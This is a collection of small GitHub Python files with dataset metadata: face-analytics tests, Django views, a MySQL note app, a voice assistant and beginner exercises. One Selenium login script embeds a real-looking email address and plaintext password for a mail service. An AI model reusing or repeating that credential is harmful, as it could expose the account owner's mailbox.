photos_base64:\n faces.append({\n \"img\": str(photo_base64)\n })\n while True:\n pacs_id: int = random.randint(0, 1000)\n if tools.get_dict_by_keys_values(old_persons_db, (\"pacs\", ), (pacs_id, )) == -1:\n break\n\n person_id = ws_analytics.faceva_update_person(ws_client, token, -1, pacs_id, name, category, comment,\n information, department, faces, [], self._statistic)\n current_persons_db = ws_analytics.faceva_get_data_base(ws_client, token, self._statistic)\n\n key_names = (\"id\", \"name\", \"pacs\", \"category\", \"comment\", \"information\", \"department\")\n key_values = (person_id, name, pacs_id, category, comment, information, department)\n if tools.get_dict_by_keys_values(current_persons_db, key_names, key_values) == -1:\n self._statistic.append_error(name, \"ПЕРСОНА НЕ ДОБАВЛЕНА\", True)\n\n self._statistic.append_success(name, \"ПЕРСОНА ДОБАВЛЕНА\")\n \"\"\"# запуск удаления\n for person_name in current_new_persons:\n # удаление из базы\n analytics.faceva_delete_person(client, self.login, self.password, person_name)\n # получение текущего списка людей в БД\n persons_db = analytics.faceva_get_data_base(client, self.login, self.password)\n # если после удаления человек в базе остался, то произошла ошибка удаления\n if tools.get_dict_by_keys_values(persons_db, [\"name\"], [person_name]) != -1:\n log.print_error(\"delete person '\" + person_name + \"' has done with error! 
It exists in data base\"\n \" after delete\")\n continue\n log.print_test(\"delete person '\" + person_name + \"' was executed successfully!\")\n # очистка списка новых людей, которые были удалены\n current_new_persons.clear() \"\"\"\n\n def test_analytic_events(self):\n \"\"\"Тест строит указанное кол-во графов устройство->микшер->ИВ54сервер->аналитика,\n затем ожидает конца дампа/ави и сравнивает фактичиские события с указанными в data\n \"\"\"\n analytic_block: dict = tools.open_json_file(self._input_data['json'], self._statistic)\n cam_json = graph.create_json_from_profiles(self._input_data['server'], analytic_block,\n self._input_data['video_source'], True, self._statistic)\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token: str = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n cam_name: str = graph.insert_graphs_to_db(ws_client, token, self._server_db_path, cam_json,\n self._input_data['server'], self._input_data['profile'], 1,\n self._statistic)[0]\n if self._input_data['detector'] == \"forget2\":\n event_type = 20074\n elif self._input_data['detector'] == \"FaceVA\":\n event_type = 20013\n else:\n self._statistic.append_error(self._input_data['detector'], \"НЕТ ДЕТЕКТОРА\", True)\n cam_info = {\n \"server\": self._input_data['server'],\n \"cam\": cam_name,\n \"profile\": self._input_data['profile']\n }\n analytics.run_events_test(ws_client, token, cam_info, self._input_data['events'],\n self._input_data['inaccuracy'], event_type, self._input_data['video_source'],\n self._statistic)\n\n def simple_kars(self):\n \"\"\"Тест проверяет работу модуля лиц по протоколу zmq.\n\n \"\"\"\n zmqclient = ZmqClient(self._config, self._statistic)\n zmqclient.start_handler_thread()\n timeout = 2.0\n # отправка hello\n message_id = zmq.send_hello(zmqclient, 1212, timeout, self._statistic)\n\n # отправка enroll_models\n model_data = zmq.send_enroll_models(zmqclient, self._input_data[\"path_to_photo\"], timeout, self._statistic)\n descriptor = model_data[0]\n model_id = model_data[1]\n\n # отправка AddModelToHotlist\n zmq.send_add_model_to_hot_list(zmqclient, model_id, descriptor, 1, 0, 1, timeout, self._statistic)\n\n # TODO логика ожидания\n while True:\n time.sleep(10)\n\n\n zmqclient.stop_handler_thread()\n","repo_name":"dmitriySSAU/TestRunner","sub_path":"tests/test_Analytics.py","file_name":"test_Analytics.py","file_ext":"py","file_size_in_byte":20090,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28133365471","text":"from django.shortcuts import render, redirect\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\nfrom django.http import HttpResponsePermanentRedirect, Http404\nfrom django.conf.urls import handler404\nfrom database.models import martabak as model_martabak\n\ndef index(request):\n return render(request, 'index.html')\n\ndef pages(request, page_requested, additional_page=\"\", last_pattern=\"\"):\n if last_pattern:\n handler404 = error_404\n if page_requested != 'menu':\n context = {\n 'page' : page_requested,\n }\n return render(request, 'pages.html', context)\n else:\n try:\n checkMartabak = model_martabak.objects.get(slug = additional_page)\n if checkMartabak:\n context = {\n 'page' : page_requested,\n 'martabak' : additional_page,\n }\n return render(request, 'detail.html', context)\n except ObjectDoesNotExist:\n return redirect(\"Menu\")\n\ndef menu(request):\n context = {\n 'page' : 'menu',\n }\n 
return render(request, 'pages.html', context)\n \ndef error_404(request, exception):\n return render(request, '404.html')\n\ndef error_500(request):\n return render(request, '404.html')","repo_name":"shamahdev/irmartabak-heroku","sub_path":"backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"18508790079","text":"from rest_framework import serializers\n\nfrom posts.models import Post\n\n\ndef validate_title(value):\n query = Post.objects.filter(title__iexact=value)\n if query.exists():\n raise serializers.ValidationError(\"Post with title already exists\")\n return value\n","repo_name":"lordace-coder/blog_api","sub_path":"posts/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30359162755","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MailTemplate',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('title', models.CharField(max_length=100)),\n ('subject', models.CharField(default=b'VOKO Utrecht - ', max_length=100)),\n ('html_body', models.TextField()),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"VOKO-Utrecht/voko","sub_path":"webapp/mailing/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"18980417104","text":"from selenium import webdriver\nimport time\n\n\n\ndriver = webdriver.Chrome()\ndriver.get('https://exmail.qq.com/cgi-bin/loginpage')\n\ndef print_info():\n title = driver.title\n print(title)\n now_url = driver.current_url\n print(now_url)\n\nprint('Before login:')\nprint_info()\n\ndriver.find_element_by_xpath(\"//*/input[@id='inputuin']\").send_keys(\"zhongxiao@secway.net.cn\")\ndriver.find_element_by_xpath(\"//*/input[@id='pp']\").send_keys(\"C@1lmexiao\")\ndriver.find_element_by_xpath(\"//*/input[@id='btlogin']\").click()\ntime.sleep(5)\n\nprint('After login:')\nprint_info()\n\ndriver.quit()","repo_name":"dltxiao/seniumvpn","sub_path":"learn/login_exmail.py","file_name":"login_exmail.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19118828366","text":"\"\"\"Test serializers.py file\"\"\"\n\nfrom django.test import TestCase\nfrom rest_framework.serializers import ModelSerializer\n\nfrom console_api.context_sources.models import ContextSources\nfrom console_api.context_sources.serializers import ContextSourcesListSerializer\n\n\nclass ContextSourcesListSerializerTests(TestCase):\n \"\"\"Test ContextSourcesListSerializer 
serializer\"\"\"\n\n def test_model(self) -> None:\n \"\"\"Test model field of meta\"\"\"\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.model,\n ContextSources,\n )\n\n def test_fields(self) -> None:\n \"\"\"Test fields field of meta\"\"\"\n\n expected_fields = [\n \"id\",\n \"ioc-type\",\n \"source-url\",\n \"request-method\",\n \"request-headers\",\n \"request-body\",\n \"inbound-removable-prefix\",\n \"outbound-appendable-prefix\",\n \"created-at\",\n \"created-by\",\n ]\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.fields,\n expected_fields,\n )\n\n def test_extra_kwargs(self) -> None:\n \"\"\"Test extra_kwargs field of meta\"\"\"\n\n expected_extra_kwargs = {\n \"ioc-type\": {\"source\": \"ioc_type\"},\n \"source-url\": {\"source\": \"source_url\"},\n \"request-method\": {\"source\": \"request_method\"},\n \"request-headers\": {\"source\": \"request_headers\"},\n \"request-body\": {\"source\": \"request_body\"},\n \"inbound-removable-prefix\": {\"source\": \"inbound_removable_prefix\"},\n \"outbound-appendable-prefix\": {\n \"source\": \"outbound_appendable_prefix\",\n },\n \"created-at\": {\"source\": \"created_at\"},\n \"created-by\": {\"source\": \"created_by\"},\n }\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.extra_kwargs,\n expected_extra_kwargs,\n )\n\n def test_mro(self) -> None:\n \"\"\"Test MRO\"\"\"\n\n self.assertIn(ModelSerializer, ContextSourcesListSerializer.mro())\n","repo_name":"hulahoo/console-check-sonar","sub_path":"src/console_api/context_sources/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73860071086","text":"photo_tags = {}\nphoto_scores = {}\n\n\ndef open_file(infile):\n fin = open(infile, 'r')\n photo_sec = fin.readlines()[1:]\n fin.close()\n return photo_sec\n\n\ndef file_operation(sec):\n i = 0\n for x in sec:\n if x[4] != \" \":\n photo_tags[i] = set(x[4:].rstrip().split(\" \"))\n else:\n photo_tags[i] = set(x[5:].rstrip().split(\" \"))\n\n i += 1\n return\n\n\ndef score(outfile):\n # for x, y in dic.items():\n # for i, j in dic.items():\n # if i in photo_scores\n # photo_scores[x] = {i: [len(y.difference(j)), len(y.intersection(j)), len(j.difference(i))]}\n fout = open(outfile, 'r')\n out_list = fout.readlines()[1:]\n result = 0\n\n for x in range(len(out_list)):\n out_list[x] = out_list[x].rstrip()\n # print(out_list)\n for x in range(len(out_list) - 1):\n left, right = photo_tags[int(out_list[x])], photo_tags[int(out_list[x + 1])]\n intersection = len(photo_tags[int(out_list[x])].intersection(photo_tags[int(out_list[x + 1])]))\n minimum = min(abs(len(left) - intersection), intersection, abs(len(right) - intersection))\n result += minimum\n # print(result)\n\n return result\n\n\nif __name__ == '__main__':\n # original = \"a_example.txt\"\n # original = \"b_lovely_landscapes.txt\"\n original = \"c_memorable_moments.txt\"\n # original = \"d_pet_pictures.txt\"\n # original = \"e_shiny_selfies.txt\"\n\n photo_sec = open_file(original)\n file_operation(photo_sec)\n print(len(photo_sec))\n # print(len(photo_tags))\n print(\"Your Score is \" + str(score(\"Final_output.txt\")))\n","repo_name":"Cooiut/Photo-slideshow","sub_path":"Test/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40508570411","text":"import random\n\ntopOfRange = 
input('enter a number: ')\n\n\nif topOfRange.isdigit():\n    topOfRange = int(topOfRange)\n    if topOfRange <= 0 :\n        print('please enter a number larger than 0 next time')\n        quit()\nelse: \n    print('please enter a number next time')\n    quit()\n\n    \nnum = random.randint(1,topOfRange)\nguesses = 0\nwhile True:\n    userGuess = input('make a guess: ')\n    if userGuess.isdigit():\n        userGuess = int(userGuess)\n    else: \n        print('please enter a number next time')\n        continue\n\n    if userGuess == num:\n        print('you got it!','after', guesses, 'guesses')\n        break\n    else: \n        guesses += 1\n        if userGuess > num:\n            print('guess smaller number')\n        else:\n            print('guess larger number')\n\n\n\n    ","repo_name":"emranaloul/grid","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
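An aside on the guessing game above: with the higher/lower hints an optimal player is doing binary search, so a range of n numbers needs at most ceil(log2(n)) guesses. A minimal sketch (max_guesses_needed is our name, not the script's):

import math

def max_guesses_needed(top_of_range: int) -> int:
    # Worst case for an optimal (binary-search) player.
    return math.ceil(math.log2(top_of_range)) if top_of_range > 1 else 1

assert max_guesses_needed(100) == 7   # 2**7 = 128 >= 100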
+{"seq_id":"19256811916","text":"import sys\nimport mysql.connector\nclass Nota():\n    def __init__(self,titulo,nota):\n        self.__titulo=titulo\n        self.__nota=nota\n\n    def get_titulo(self):\n        return self.__titulo\n\n    def get_nota(self):\n        return self.__nota\n\ndef ingresar_nota():\n    print(\"ingrese su nota en el nombre de las persona ingrese 'destinatario' y 'remitente'\\\n    para salir escriba termine solo\")\n    \"\"\"Recibe la nota en oraciones\"\"\"\n    lista_renglones=[]\n    titulo=input(\"ingrese Titulo: \")\n    while True:\n        print(\"Linea:\",end=\" \")\n        renglon=input(\"\")\n        if renglon.lower()==\"termine\":\n            break\n        while len(renglon)>399:\n            if len(renglon[0:renglon.find(\".\")+1]) < 399:\n                lista_renglones.append(renglon[0:renglon.find(\".\")+1])\n                renglon=renglon[renglon.find(\".\")+1:len(renglon)-1]\n            elif len(renglon[0:renglon.find(\",\")+1]) < 399:\n                lista_renglones.append(renglon[0:renglon.find(\",\")+1])\n                renglon=renglon[renglon.find(\",\")+1:len(renglon)-1] \n            else:\n                lista_renglones.append(renglon[0:399])\n                renglon=renglon[399:len(renglon)-1]\n        lista_renglones.append(renglon)\n    nota=Nota(titulo, lista_renglones) \n    return nota\n    \n    \n\ndef ingresar_personas():\n    \"\"\"recibe los destinatarios\"\"\"\n    lista=[]\n    while True:\n        destinatario=input(\"Ingrese la persona destinatario, ingrese un numero \\\npara salir: \")\n        print(\"\")\n        if destinatario.isnumeric():\n            break\n        lista.append(destinatario)\n    \"\"\"recibe el remitente\"\"\" \n    remitente=input(\"Ingrese la persona remitente: \") \n    return lista,remitente\n\ndef cambiar_mensaje(nota_entrante,destinatario,remitente):\n    \"\"\"cambiar destinatario y remitente\"\"\"\n    nota_recibida=nota_entrante.copy()\n    for y,x in enumerate(nota_recibida):\n        nota_recibida[y]=x.replace(\"destinatario\",destinatario).replace(\"remitente\",remitente) \n    return nota_recibida\n\ndef cargar_nota():\n    \"\"\"cargar archivo nota\"\"\"\n    notas=[]\n    conexion1=mysql.connector.connect(\n        host=\"localhost\",\n        user=\"root\",\n        password=\"root\",\n        database=\"nota\"\n    )\n    cursor=conexion1.cursor()\n    \"\"\"cursor de titulo\"\"\"\n    query=\"SELECT titulo,id_nota FROM titulo\"\n    cursor.execute(query)\n    identificador=cursor.fetchall()\n    \"\"\"cursor de renglón\"\"\"\n    query=\"SELECT id_nota,renglones FROM renglones\"\n    cursor.execute(query)\n    archi=cursor.fetchall()\n    \"\"\"devuelve una lista de dato clase nota\"\"\"\n    for titulo,id_nota in identificador:\n        renglones=[]\n        for x in archi:\n            if x[0]==id_nota:\n                renglones.append(x[1])\n        notas.append(Nota(titulo,renglones))\n    return notas\n\ndef buscar_por_nombre(nota):\n    \"\"\"busca\"\"\"\n    notas=cargar_nota()\n    for note in notas:\n        if note.get_titulo()==nota.get_titulo():\n            return note\n\ndef guardar_nota(nota):\n    \"\"\"conecta con mysql\"\"\"\n    conexion1=mysql.connector.connect(\n        host=\"localhost\",\n        user=\"root\",\n        password=\"root\",\n        database=\"nota\"\n    )\n    cursor=conexion1.cursor()\n    \n    \"\"\"crea el titulo si no existe\"\"\"\n    query=\"INSERT INTO titulo(titulo) SELECT(%s) FROM dual WHERE \\\nNOT EXISTS(SELECT titulo FROM titulo WHERE titulo=%s)LIMIT 1\"\n    dato=(nota.get_titulo(),nota.get_titulo())\n    cursor.execute(query,dato)\n    conexion1.commit()\n    \n    \"\"\"trae el identificador del titulo\"\"\"\n    query=\"SELECT id_nota FROM titulo where titulo=%s\"\n    dato=(nota.get_titulo(),)\n    cursor.execute(query,dato)\n    id_nota_titulo=cursor.fetchall()\n    \n    \"\"\"busca el identidicador dentro de los renglones\"\"\"\n    query=\"SELECT id_nota FROM renglones where id_nota=%s\"\n    dato=id_nota_titulo[0]\n    cursor.execute(query,dato)\n    id_nota_renglones=cursor.fetchall()\n    \n    \"\"\"si no existe nota con ese identificador la crea\"\"\"\n    if id_nota_renglones == []:\n        query=\"INSERT INTO renglones(id_nota,renglones) values (%s,%s)\"\n        nota_texto=nota.get_nota()\n        for renglon in nota_texto:\n            datos=(id_nota_titulo[0][0],renglon)\n            cursor.execute(query,datos)\n        conexion1.commit()\n        return True\n    else:\n        print(\"nota con ese nombre existe\") \n        return False\n\ndef elegir_predefinido():\n    try:\n        lista_nota=cargar_nota()\n    except Exception as ex:\n        print(ex)\n        sys.exit(1)\n    \n    print(\"\")\n    for lis in lista_nota:\n        mostrar_nota(lis)\n        print(\"\")\n\n    titulo=input(\"titulo elegido: \").lower()\n    for nota in lista_nota:\n        if nota.get_titulo()==titulo:\n            return nota\n    return None\n\ndef mostrar_nota(tipo_nota):\n    titulo=tipo_nota.get_titulo()\n    lista=tipo_nota.get_nota()\n    print(\"\")\n    print(\"----\")\n    print(\"\\t\",titulo.upper())\n    print(\"\")\n    for x,linea in enumerate(lista):\n        if x==0:\n            print(\" \",linea)\n        elif x==len(lista)-1:\n            print(\" \",linea)\n        else:\n            print(\" \",linea) \n\n\ndef main():\n    print(\"1- Mensaje predefinido\")\n    print(\"2- Mensaje propio\")\n    print(\"sali con cualquier otra opción\")\n    opcion=int(input(\"Ingrese Opción:\"))\n    if opcion == 1:\n        print(\"Modelos de nota\")\n        nota=elegir_predefinido() \n    elif opcion == 2:\n        print(\"Manda tu mensaje\") \n        print(\"\")\n        nota=ingresar_nota()\n        \"\"\"si la nota existe entrega la copia existente\"\"\"\n        if not guardar_nota(nota):\n            nota=buscar_por_nombre(nota)\n    else:\n        sys.exit(0)\n\n    destinatarios,remitente=ingresar_personas()\n    for destinatario in destinatarios:\n        mostrar_nota(Nota(nota.get_titulo(),cambiar_mensaje(nota.get_nota(),destinatario,remitente)))\n\nmain()","repo_name":"informatorio2020com07/actividades","sub_path":"CarlosComba/actividad_004/actividad_4.py","file_name":"actividad_4.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30259726989","text":"import pytest\n\nfrom tests.integration.helper import NetpalmTestHelper\n\nhelper = NetpalmTestHelper()\n\n\n@pytest.mark.test_worker_route\ndef test_worker():\n    res = helper.get(\"workers/\")\n    assert len(res) > 0\n\n\n@pytest.mark.test_kill_worker\ndef test_kill_worker():\n    resz = helper.get(\"workers/\")\n    rt = \"workers/kill/\" + resz[0][\"name\"]\n    rest = helper.post(rt, data={})\n    assert rest is None\n\n\n@pytest.mark.test_pinned_container\ndef test_worker_pinned_container():\n    res = helper.get(\"containers/pinned/\")\n    assert len(res) > 0\n","repo_name":"tbotnz/netpalm","sub_path":"tests/integration/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":423,"dataset":"github-code","pt":"2"}
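For context on the netpalm integration tests above, a rough sketch of the shape a helper like NetpalmTestHelper could have, assuming a plain requests-based JSON API; the class name, base URL and return handling are assumptions, not netpalm's actual test fixture:

import requests

class JsonApiHelper:
    def __init__(self, base_url="http://localhost:9000/"):  # assumed base URL
        self.base_url = base_url

    def get(self, route):
        # Return the decoded JSON body of a GET to base_url + route.
        return requests.get(self.base_url + route).json()

    def post(self, route, data):
        # POST a JSON payload and return the decoded JSON response.
        return requests.post(self.base_url + route, json=data).json()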
0\n","repo_name":"tbotnz/netpalm","sub_path":"tests/integration/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":423,"dataset":"github-code","pt":"2"} +{"seq_id":"74755122606","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport pywhatkit\r\nimport datetime\r\nimport wikipedia\r\nimport pyowm\r\nfrom pyowm import OWM\r\n\r\nlistener = sr.Recognizer()\r\n\r\nmachine = pyttsx3.init()\r\n\r\n\r\ndef talk(text):\r\n machine.say(text) # Give O/p of Text\r\n machine.runAndWait()\r\n\r\n\r\nprint(\"How may I help You!!\")\r\ntalk(\"How may I help You!!\")\r\n\r\n\r\n# Function to take instruction and s=show it on screen\r\ndef input_instruction():\r\n # Listening Part Of Assistant\r\n # Try Block is used to check there is any kind of error in microphone\r\n global instruction\r\n try:\r\n\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n\r\n speech = listener.listen(source, timeout=20)\r\n instruction = listener.recognize_google(speech) # Google API\r\n instruction = instruction.lower()\r\n if \"Hey Assistant\" in instruction: # Assistant listening the Command\r\n instruction = instruction.replace('Hey Assistant', \" \")\r\n print(instruction)\r\n\r\n return instruction\r\n\r\n\r\n except sr.WaitTimeoutError:\r\n print(\"Listening timed out.\")\r\n\r\n except sr.RequestError:\r\n print(\"Could not request results; check your network connection.\")\r\n\r\n except sr.UnknownValueError:\r\n print(\"Sorry, I didn't catch that.\")\r\n\r\n\r\n# Weather Function to check specific city weather\r\n\r\ndef get_weather(city):\r\n # install & import pyown library\r\n # for api key read the documentation of pyowm library on google\r\n api_key = 'Your_api_key'\r\n owm = OWM(api_key)\r\n mgr = owm.weather_manager()\r\n try:\r\n observation = mgr.weather_at_place(city + ',IN')\r\n w = observation.weather\r\n weather_info = w.detailed_status\r\n temperature = w.temperature('celsius')['temp']\r\n print(f\"The weather in {city} is {weather_info}. The temperature is {temperature} degrees Celsius.\")\r\n talk(f\"The weather in {city} is {weather_info}. The temperature is {temperature} degrees Celsius.\")\r\n except pyowm.exceptions.api_response_error.NotFoundError:\r\n talk(f\"Sorry, I couldn't find weather information for {city}.\")\r\n\r\n\r\ndef play_assistant():\r\n instruction = input_instruction()\r\n print(instruction)\r\n if instruction is None:\r\n talk(\"No commands to execute,Okay Thnx\")\r\n # 1. Command to Play Youtube_Video. Say - Hey Assistant Play \"Video_name\"\r\n elif \"play\" in instruction:\r\n song = instruction.replace('play', \"\") # instaead of play the Assistant say the name of video\r\n talk(\"playing\" + song)\r\n pywhatkit.playonyt(song)\r\n\r\n\r\n # 2. Command to ask current time. Say - Hey Assistant any sentence where time word is mentioned\r\n elif 'time' in instruction:\r\n time = datetime.datetime.now().strftime('%I:%M%p')\r\n talk('Current time is ' + time)\r\n\r\n # 3. Command to ask Today's date. Say - Hey Assistant any sentence where 'today's date' word is mentioned\r\n elif 'date' in instruction:\r\n date = datetime.datetime.now().strftime('%d /%m / %y')\r\n talk(\"Today's'is \" + date)\r\n\r\n elif 'How are you' in instruction:\r\n talk(\"I'm Fine , how about you\")\r\n\r\n # 5. Command to ask about a particular person. 
Say - Hey Assistant who is 'person name'\r\n elif 'who is' in instruction:\r\n human = instruction.replace('who is', \" \")\r\n info = wikipedia.summary(human, 1)\r\n print(info)\r\n talk(info)\r\n\r\n # 6. Command to ask about any thing. Say - Hey Assistant any sentence what is 'thing name'\r\n elif 'what is' in instruction:\r\n query = instruction.replace('what is', \" \")\r\n info = wikipedia.summary(query, 1)\r\n print(info)\r\n talk(info)\r\n\r\n # 7. Command to add 2 digits.Say - Hey Assistant add two number and provide it number one by one\r\n elif \"add\" in instruction:\r\n talk(\"Ok! Please tell first digit\")\r\n spokent_text1 = input_instruction()\r\n talk(\"First Digit is: \" + spokent_text1)\r\n talk(\"Ok! Please tell second digit\")\r\n spokent_text2 = input_instruction()\r\n talk(\"Second Digit is: \" + spokent_text2)\r\n sum = int(spokent_text1) + int(spokent_text2)\r\n talk(\"Sum of this 2 digit is: \" + str(sum))\r\n\r\n # 8. Command to ask weather of any city. Say - weather of 'city name'\r\n # Tell only city name once again when Assistant asks\r\n elif 'weather' in instruction:\r\n talk(\"Okay can you please say city name again?\")\r\n cityname = input_instruction()\r\n get_weather(cityname)\r\n\r\n # else condition\r\n else:\r\n talk(\"Please Repeat!!\")\r\n\r\n\r\nplay_assistant() # play_Assistant funtion called\r\n","repo_name":"Vinay1311/Virtual_Assistant","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33323620940","text":"#094 Display an array of five numbers. Ask the user to select one of the numbers. \n#Once they have selected a number, display the position of that item in the array. If they enter something that is not in the array,\n#ask them to try again until they select a relevant item\nfrom array import*\n\ndef numbers():\n \n numbers = array('i',[1,5,3,4,9])\n print(numbers)\n choice = int(input('Select a number from array: '))\n \n while choice not in numbers:\n choice = int(input('Try again enter a number: '))\n print(numbers.index(choice))\n \n\nnumbers()\n\n\n\n","repo_name":"JonathanVillordo/PythonByExample","sub_path":"Challenge_094.py","file_name":"Challenge_094.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"34135688716","text":"import random\nrock=''' \n _\n | |\n _ __ ___ ___| | __\n| '__/ _ \\ / __| |/ /\n| | | (_) | (__| <\n|_| \\___/ \\___|_|\\_\\ \n'''\n\npaper=''' \n_ __ __ _ _ __ ___ _ __ \n| '_ \\ / _` | '_ \\ / _ \\ '__|\n| |_) | (_| | |_) | __/ | \n| .__/ \\__,_| .__/ \\___|_| \n| | | | \n|_| |_| \n'''\n\nscissor=''' \n _ ,/'\n (_). ,/'\n __ ::\n (__)' `\\.\n `\\.\n\n \n '''\ngame_images=[rock,paper,scissor] #list of images\n\nyour_choice=int(input(\"what do you choose? Type 0 for rock, 1 for paper or 2 for scissors. 
\\n\")) #users input\nprint(game_images[your_choice])\ncomputer_choice=random.randint(0,2) #computers input\nprint(\"Computer chose: \")\nprint(game_images[computer_choice])\nif your_choice==computer_choice:\n print(\"Its a draw\")\nelif your_choice==0: #o is rock\n if computer_choice==1: #1 is paper ( paper covers rock hence you win)\n print(\"Computer wins , paper covers rock\")\n else:\n print(\"You Win, rock crushes scissor\")\nelif your_choice==1: #1 is paper\n if computer_choice==0: #1 is rock ( paper covers rock hence Computer wins)\n print(\"You win, paper covers rock\")\n else:\n print(\"Computer wins , scissor cuts paper\")\nelif your_choice==2: #2 is scissor\n if computer_choice==0: #0 is rock ( rock crushes scissor hence You win)\n print(\"Computer wins , rock crushes scissor\")\n else: #1 is paper ( scissor cuts paper)\n print(\"You win , scissor cuts paper\")\nelse:\n print(f\"You chose {your_choice} & Computer chose {computer_choice}, You lose\")\n\n\n\n","repo_name":"KanmaniThiagarajan/100DaysOfPython","sub_path":"d04/rockpaperscissor.py","file_name":"rockpaperscissor.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"628266021","text":"n = int(input())\nstack = []\n\nfor i in range(n):\n queries = input()\n\n if queries[0] == '1':\n queries = queries.split()\n number = int(queries[1])\n stack.append(number)\n else:\n if len(stack) > 0:\n if queries == '2':\n stack.pop()\n elif queries == '3':\n print(max(stack))\n else:\n print(min(stack))\n\nstack = stack[::-1]\nprint(', '.join(str(i) for i in stack))","repo_name":"PavelElenov/Python_Advanced","sub_path":"Lists as Stacks and Queues - Exercise/stacked_queries.py","file_name":"stacked_queries.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25886970505","text":"from turtle import Turtle, Screen\nimport random\n\ncorrida = True\nscreen = Screen()\nscreen.setup(width=500, height=400)\nescolha = screen.textinput(title=\"Faça a sua aposta\", prompt=\"Qual tartaruga irá ganhar a corrida?\\nRED, ORANGE, YELLOW, GREEN, BLUE, PURPLE\\nInsira uma cor: \")\ncores = [\"RED\", \"ORANGE\", \"YELLOW\", \"GREEN\", \"BLUE\", \"PURPLE\"]\ny_tartaruga = [-70, -40, -10, 20, 50, 80]\ntodas_tartarugas = []\n\nfor turtle_index in range(0, 6):\n nova_tartaruga = Turtle(shape=\"turtle\")\n nova_tartaruga.color(cores[turtle_index])\n nova_tartaruga.penup()\n nova_tartaruga.goto(x=-230, y=y_tartaruga[turtle_index])\n todas_tartarugas.append(nova_tartaruga)\n\nif escolha:\n corrida = True\n\nwhile corrida:\n for turtle in todas_tartarugas:\n if turtle.xcor() > 230:\n corrida = False\n vencedora = turtle.pencolor()\n if vencedora == escolha:\n print(f\"Você ganhou! A tartaruga vencedora foi a {vencedora}\")\n else:\n print(f\"Você perdeu! 
A tartaruga vencedora foi a {vencedora}\")\n\n distancia = random.randint(0, 10)\n turtle.forward(distancia)\n\nscreen.exitonclick()","repo_name":"brunomdrrosa/100DaysOfPython","sub_path":"Day19/corridaDeTartaruga.py","file_name":"corridaDeTartaruga.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"36008028426","text":"from bokeh.plotting import figure, show, from_networkx\nfrom bokeh.models import Range1d, Plot, HoverTool\nfrom bokeh.palettes import Category20_20\n\nimport networkx as nx\n\n# NetworkX\nG = nx.desargues_graph()\n\n# Plot figure \np = Plot(x_range=Range1d(-2, 2), y_range=Range1d(-2, 2))\n\n# Creating a bokeh graph\ng = from_networkx(G, nx.spring_layout, scale = 1.8, center=(0,0))\np.renderers.append(g)\n\n# Add Data\ng.node_renderer.data_source.data['person'] = list(range(len(G)))\ng.node_renderer.data_source.data[\"colors\"] = Category20_20\n\n# Setup default node as circle\ng.node_renderer.glyph.update(size=15, fill_color=\"colors\")\n\n# Set edges (connections)\ng.edge_renderer.glyph.line_dash = [2,2]\n\np.add_tools(HoverTool(tooltips=\"Person ID: 